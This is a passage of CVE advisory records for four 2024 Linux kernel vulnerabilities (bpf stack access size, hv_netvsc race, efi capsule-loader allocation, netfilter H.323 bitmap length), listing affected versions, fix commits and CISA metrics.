"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "6.1.75",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "6.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.7.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Protect against int overflow for stack access size\n\nThis patch re-introduces protection against the size of access to stack\nmemory being negative; the access size can appear negative as a result\nof overflowing its signed int representation. This should not actually\nhappen, as there are other protections along the way, but we should\nprotect against it anyway. One code path was missing such protections\n(fixed in the previous patch in the series), causing out-of-bounds array\naccesses in check_stack_range_initialized(). This patch causes the\nverification of a program with such a non-sensical access size to fail.\n\nThis check used to exist in a more indirect way, but was inadvertendly\nremoved in a833a17aeac7."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:03.837Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9970e059af471478455f9534e8c3db82f8c5496d"
},
{
"url": "https://git.kernel.org/stable/c/37dc1718dc0c4392dbfcb9adec22a776e745dd69"
},
{
"url": "https://git.kernel.org/stable/c/98cdac206b112bec63852e94802791e316acc2c1"
},
{
"url": "https://git.kernel.org/stable/c/3f0784b2f1eb9147973d8c43ba085c5fdf44ff69"
},
{
"url": "https://git.kernel.org/stable/c/203a68151e8eeb331d4a64ab78303f3a15faf103"
},
{
"url": "https://git.kernel.org/stable/c/ecc6a2101840177e57c925c102d2d29f260d37c8"
}
],
"title": "bpf: Protect against int overflow for stack access size",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35905",
"datePublished": "2024-05-19T08:34:58.347Z",
"dateReserved": "2024-05-17T13:50:33.120Z",
"dateUpdated": "2025-05-04T12:56:03.837Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26698 (GCVE-0-2024-26698)
Vulnerability from cvelistv5
Published
2024-04-03 14:54
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
hv_netvsc: Fix race condition between netvsc_probe and netvsc_remove
In commit ac5047671758 ("hv_netvsc: Disable NAPI before closing the
VMBus channel"), napi_disable was getting called for all channels,
including all subchannels without confirming if they are enabled or not.
This caused hv_netvsc getting hung at napi_disable, when netvsc_probe()
has finished running but nvdev->subchan_work has not started yet.
netvsc_subchan_work() -> rndis_set_subchannel() has not created the
sub-channels and because of that netvsc_sc_open() is not running.
netvsc_remove() calls cancel_work_sync(&nvdev->subchan_work), for which
netvsc_subchan_work did not run.
netif_napi_add() sets the bit NAPI_STATE_SCHED because it ensures NAPI
cannot be scheduled. Then netvsc_sc_open() -> napi_enable will clear the
NAPIF_STATE_SCHED bit, so it can be scheduled. napi_disable() does the
opposite.
Now during netvsc_device_remove(), when napi_disable is called for those
subchannels, napi_disable gets stuck on infinite msleep.
This fix addresses this problem by ensuring that napi_disable() is not
getting called for non-enabled NAPI struct.
But netif_napi_del() is still necessary for these non-enabled NAPI struct
for cleanup purpose.
Call trace:
[ 654.559417] task:modprobe state:D stack: 0 pid: 2321 ppid: 1091 flags:0x00004002
[ 654.568030] Call Trace:
[ 654.571221] <TASK>
[ 654.573790] __schedule+0x2d6/0x960
[ 654.577733] schedule+0x69/0xf0
[ 654.581214] schedule_timeout+0x87/0x140
[ 654.585463] ? __bpf_trace_tick_stop+0x20/0x20
[ 654.590291] msleep+0x2d/0x40
[ 654.593625] napi_disable+0x2b/0x80
[ 654.597437] netvsc_device_remove+0x8a/0x1f0 [hv_netvsc]
[ 654.603935] rndis_filter_device_remove+0x194/0x1c0 [hv_netvsc]
[ 654.611101] ? do_wait_intr+0xb0/0xb0
[ 654.615753] netvsc_remove+0x7c/0x120 [hv_netvsc]
[ 654.621675] vmbus_remove+0x27/0x40 [hv_vmbus]
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ac5047671758ad4be9f93898247b3a8b6dfde4c7 Version: ac5047671758ad4be9f93898247b3a8b6dfde4c7 Version: ac5047671758ad4be9f93898247b3a8b6dfde4c7 Version: ac5047671758ad4be9f93898247b3a8b6dfde4c7 Version: ac5047671758ad4be9f93898247b3a8b6dfde4c7 Version: ac5047671758ad4be9f93898247b3a8b6dfde4c7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26698",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T18:03:45.740958Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:08.824Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.951Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9ec807e7b6f5fcf9499f3baa69f254bb239a847f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7656372ae190e54e8c8cf1039725a5ea59fdf84a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/48a8ccccffbae10c91d31fc872db5c31aba07518"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/22a77c0f5b8233237731df3288d067af51a2fd7b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e8875de9dad12805ff66e92cd5edea6a421f1cd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e0526ec5360a48ad3ab2e26e802b0532302a7e11"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/hyperv/netvsc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9ec807e7b6f5fcf9499f3baa69f254bb239a847f",
"status": "affected",
"version": "ac5047671758ad4be9f93898247b3a8b6dfde4c7",
"versionType": "git"
},
{
"lessThan": "7656372ae190e54e8c8cf1039725a5ea59fdf84a",
"status": "affected",
"version": "ac5047671758ad4be9f93898247b3a8b6dfde4c7",
"versionType": "git"
},
{
"lessThan": "48a8ccccffbae10c91d31fc872db5c31aba07518",
"status": "affected",
"version": "ac5047671758ad4be9f93898247b3a8b6dfde4c7",
"versionType": "git"
},
{
"lessThan": "22a77c0f5b8233237731df3288d067af51a2fd7b",
"status": "affected",
"version": "ac5047671758ad4be9f93898247b3a8b6dfde4c7",
"versionType": "git"
},
{
"lessThan": "0e8875de9dad12805ff66e92cd5edea6a421f1cd",
"status": "affected",
"version": "ac5047671758ad4be9f93898247b3a8b6dfde4c7",
"versionType": "git"
},
{
"lessThan": "e0526ec5360a48ad3ab2e26e802b0532302a7e11",
"status": "affected",
"version": "ac5047671758ad4be9f93898247b3a8b6dfde4c7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/hyperv/netvsc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhv_netvsc: Fix race condition between netvsc_probe and netvsc_remove\n\nIn commit ac5047671758 (\"hv_netvsc: Disable NAPI before closing the\nVMBus channel\"), napi_disable was getting called for all channels,\nincluding all subchannels without confirming if they are enabled or not.\n\nThis caused hv_netvsc getting hung at napi_disable, when netvsc_probe()\nhas finished running but nvdev-\u003esubchan_work has not started yet.\nnetvsc_subchan_work() -\u003e rndis_set_subchannel() has not created the\nsub-channels and because of that netvsc_sc_open() is not running.\nnetvsc_remove() calls cancel_work_sync(\u0026nvdev-\u003esubchan_work), for which\nnetvsc_subchan_work did not run.\n\nnetif_napi_add() sets the bit NAPI_STATE_SCHED because it ensures NAPI\ncannot be scheduled. Then netvsc_sc_open() -\u003e napi_enable will clear the\nNAPIF_STATE_SCHED bit, so it can be scheduled. napi_disable() does the\nopposite.\n\nNow during netvsc_device_remove(), when napi_disable is called for those\nsubchannels, napi_disable gets stuck on infinite msleep.\n\nThis fix addresses this problem by ensuring that napi_disable() is not\ngetting called for non-enabled NAPI struct.\nBut netif_napi_del() is still necessary for these non-enabled NAPI struct\nfor cleanup purpose.\n\nCall trace:\n[ 654.559417] task:modprobe state:D stack: 0 pid: 2321 ppid: 1091 flags:0x00004002\n[ 654.568030] Call Trace:\n[ 654.571221] \u003cTASK\u003e\n[ 654.573790] __schedule+0x2d6/0x960\n[ 654.577733] schedule+0x69/0xf0\n[ 654.581214] schedule_timeout+0x87/0x140\n[ 654.585463] ? __bpf_trace_tick_stop+0x20/0x20\n[ 654.590291] msleep+0x2d/0x40\n[ 654.593625] napi_disable+0x2b/0x80\n[ 654.597437] netvsc_device_remove+0x8a/0x1f0 [hv_netvsc]\n[ 654.603935] rndis_filter_device_remove+0x194/0x1c0 [hv_netvsc]\n[ 654.611101] ? do_wait_intr+0xb0/0xb0\n[ 654.615753] netvsc_remove+0x7c/0x120 [hv_netvsc]\n[ 654.621675] vmbus_remove+0x27/0x40 [hv_vmbus]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:20.211Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9ec807e7b6f5fcf9499f3baa69f254bb239a847f"
},
{
"url": "https://git.kernel.org/stable/c/7656372ae190e54e8c8cf1039725a5ea59fdf84a"
},
{
"url": "https://git.kernel.org/stable/c/48a8ccccffbae10c91d31fc872db5c31aba07518"
},
{
"url": "https://git.kernel.org/stable/c/22a77c0f5b8233237731df3288d067af51a2fd7b"
},
{
"url": "https://git.kernel.org/stable/c/0e8875de9dad12805ff66e92cd5edea6a421f1cd"
},
{
"url": "https://git.kernel.org/stable/c/e0526ec5360a48ad3ab2e26e802b0532302a7e11"
}
],
"title": "hv_netvsc: Fix race condition between netvsc_probe and netvsc_remove",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26698",
"datePublished": "2024-04-03T14:54:58.577Z",
"dateReserved": "2024-02-19T14:20:24.157Z",
"dateUpdated": "2025-05-04T08:54:20.211Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27413 (GCVE-0-2024-27413)
Vulnerability from cvelistv5
Published
2024-05-17 11:50
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
efi/capsule-loader: fix incorrect allocation size
gcc-14 notices that the allocation with sizeof(void) on 32-bit architectures
is not enough for a 64-bit phys_addr_t:
drivers/firmware/efi/capsule-loader.c: In function 'efi_capsule_open':
drivers/firmware/efi/capsule-loader.c:295:24: error: allocation of insufficient size '4' for type 'phys_addr_t' {aka 'long long unsigned int'} with size '8' [-Werror=alloc-size]
295 | cap_info->phys = kzalloc(sizeof(void *), GFP_KERNEL);
| ^
Use the correct type instead here.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f24c4d478013d82bd1b943df566fff3561d52864 Version: f24c4d478013d82bd1b943df566fff3561d52864 Version: f24c4d478013d82bd1b943df566fff3561d52864 Version: f24c4d478013d82bd1b943df566fff3561d52864 Version: f24c4d478013d82bd1b943df566fff3561d52864 Version: f24c4d478013d82bd1b943df566fff3561d52864 Version: f24c4d478013d82bd1b943df566fff3561d52864 Version: f24c4d478013d82bd1b943df566fff3561d52864 Version: 95a362c9a6892085f714eb6e31eea6a0e3aa93bf |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27413",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:39:33.014498Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:43:44.618Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.364Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/00cf21ac526011a29fc708f8912da446fac19f7b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/950d4d74d311a18baed6878dbfba8180d7e5dddd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/537e3f49dbe88881a6f0752beaa596942d9efd64"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b73473c050a612fb4317831371073eda07c3050"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ddc547dd05a46720866c32022300f7376c40119f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/11aabd7487857b8e7d768fefb092f66dfde68492"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62a5dcd9bd3097e9813de62fa6f22815e84a0172"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fccfa646ef3628097d59f7d9c1a3e84d4b6bb45e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/efi/capsule-loader.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "00cf21ac526011a29fc708f8912da446fac19f7b",
"status": "affected",
"version": "f24c4d478013d82bd1b943df566fff3561d52864",
"versionType": "git"
},
{
"lessThan": "950d4d74d311a18baed6878dbfba8180d7e5dddd",
"status": "affected",
"version": "f24c4d478013d82bd1b943df566fff3561d52864",
"versionType": "git"
},
{
"lessThan": "537e3f49dbe88881a6f0752beaa596942d9efd64",
"status": "affected",
"version": "f24c4d478013d82bd1b943df566fff3561d52864",
"versionType": "git"
},
{
"lessThan": "4b73473c050a612fb4317831371073eda07c3050",
"status": "affected",
"version": "f24c4d478013d82bd1b943df566fff3561d52864",
"versionType": "git"
},
{
"lessThan": "ddc547dd05a46720866c32022300f7376c40119f",
"status": "affected",
"version": "f24c4d478013d82bd1b943df566fff3561d52864",
"versionType": "git"
},
{
"lessThan": "11aabd7487857b8e7d768fefb092f66dfde68492",
"status": "affected",
"version": "f24c4d478013d82bd1b943df566fff3561d52864",
"versionType": "git"
},
{
"lessThan": "62a5dcd9bd3097e9813de62fa6f22815e84a0172",
"status": "affected",
"version": "f24c4d478013d82bd1b943df566fff3561d52864",
"versionType": "git"
},
{
"lessThan": "fccfa646ef3628097d59f7d9c1a3e84d4b6bb45e",
"status": "affected",
"version": "f24c4d478013d82bd1b943df566fff3561d52864",
"versionType": "git"
},
{
"status": "affected",
"version": "95a362c9a6892085f714eb6e31eea6a0e3aa93bf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/efi/capsule-loader.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.309",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.309",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nefi/capsule-loader: fix incorrect allocation size\n\ngcc-14 notices that the allocation with sizeof(void) on 32-bit architectures\nis not enough for a 64-bit phys_addr_t:\n\ndrivers/firmware/efi/capsule-loader.c: In function \u0027efi_capsule_open\u0027:\ndrivers/firmware/efi/capsule-loader.c:295:24: error: allocation of insufficient size \u00274\u0027 for type \u0027phys_addr_t\u0027 {aka \u0027long long unsigned int\u0027} with size \u00278\u0027 [-Werror=alloc-size]\n 295 | cap_info-\u003ephys = kzalloc(sizeof(void *), GFP_KERNEL);\n | ^\n\nUse the correct type instead here."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:41.446Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/00cf21ac526011a29fc708f8912da446fac19f7b"
},
{
"url": "https://git.kernel.org/stable/c/950d4d74d311a18baed6878dbfba8180d7e5dddd"
},
{
"url": "https://git.kernel.org/stable/c/537e3f49dbe88881a6f0752beaa596942d9efd64"
},
{
"url": "https://git.kernel.org/stable/c/4b73473c050a612fb4317831371073eda07c3050"
},
{
"url": "https://git.kernel.org/stable/c/ddc547dd05a46720866c32022300f7376c40119f"
},
{
"url": "https://git.kernel.org/stable/c/11aabd7487857b8e7d768fefb092f66dfde68492"
},
{
"url": "https://git.kernel.org/stable/c/62a5dcd9bd3097e9813de62fa6f22815e84a0172"
},
{
"url": "https://git.kernel.org/stable/c/fccfa646ef3628097d59f7d9c1a3e84d4b6bb45e"
}
],
"title": "efi/capsule-loader: fix incorrect allocation size",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27413",
"datePublished": "2024-05-17T11:50:53.780Z",
"dateReserved": "2024-02-25T13:47:42.682Z",
"dateUpdated": "2025-05-04T12:55:41.446Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26851 (GCVE-0-2024-26851)
Vulnerability from cvelistv5
Published
2024-04-17 10:17
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_conntrack_h323: Add protection for bmp length out of range
UBSAN load reports an exception of BRK#5515 SHIFT_ISSUE:Bitwise shifts
that are out of bounds for their data type.
vmlinux get_bitmap(b=75) + 712
<net/netfilter/nf_conntrack_h323_asn1.c:0>
vmlinux decode_seq(bs=0xFFFFFFD008037000, f=0xFFFFFFD008037018, level=134443100) + 1956
<net/netfilter/nf_conntrack_h323_asn1.c:592>
vmlinux decode_choice(base=0xFFFFFFD0080370F0, level=23843636) + 1216
<net/netfilter/nf_conntrack_h323_asn1.c:814>
vmlinux decode_seq(f=0xFFFFFFD0080371A8, level=134443500) + 812
<net/netfilter/nf_conntrack_h323_asn1.c:576>
vmlinux decode_choice(base=0xFFFFFFD008037280, level=0) + 1216
<net/netfilter/nf_conntrack_h323_asn1.c:814>
vmlinux DecodeRasMessage() + 304
<net/netfilter/nf_conntrack_h323_asn1.c:833>
vmlinux ras_help() + 684
<net/netfilter/nf_conntrack_h323_main.c:1728>
vmlinux nf_confirm() + 188
<net/netfilter/nf_conntrack_proto.c:137>
Due to abnormal data in skb->data, the extension bitmap length
exceeds 32 when decoding ras message then uses the length to make
a shift operation. It will change into negative after several loop.
UBSAN load could detect a negative shift as an undefined behaviour
and reports exception.
So we add the protection to avoid the length exceeding 32. Or else
it will return out of range error and stop decoding.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 Version: 5e35941d990123f155b02d5663e51a24f816b6f3 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26851",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T17:33:25.792652Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T17:33:34.212Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.704Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98db42191329c679f4ca52bec0b319689e1ad8cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4bafcc43baf7bcf93566394dbd15726b5b456b7a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ccd1108b16ab572d9bf635586b0925635dbd6bbc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b3c0f553820516ad4b62a9390ecd28d6f73a7b13"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/39001e3c42000e7c2038717af0d33c32319ad591"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/014a807f1cc9c9d5173c1cd935835553b00d211c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80ee5054435a11c87c9a4f30f1ff750080c96416"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/767146637efc528b5e3d31297df115e85a2fd362"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_conntrack_h323_asn1.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "98db42191329c679f4ca52bec0b319689e1ad8cb",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "4bafcc43baf7bcf93566394dbd15726b5b456b7a",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "ccd1108b16ab572d9bf635586b0925635dbd6bbc",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "b3c0f553820516ad4b62a9390ecd28d6f73a7b13",
"status": "affected",
"version": "5e35941d990123f155b02d5663e51a24f816b6f3",
"versionType": "git"
},
{
"lessThan": "39001e3c42000e7c2038717af0d33c32319ad591",
"status": "affected",
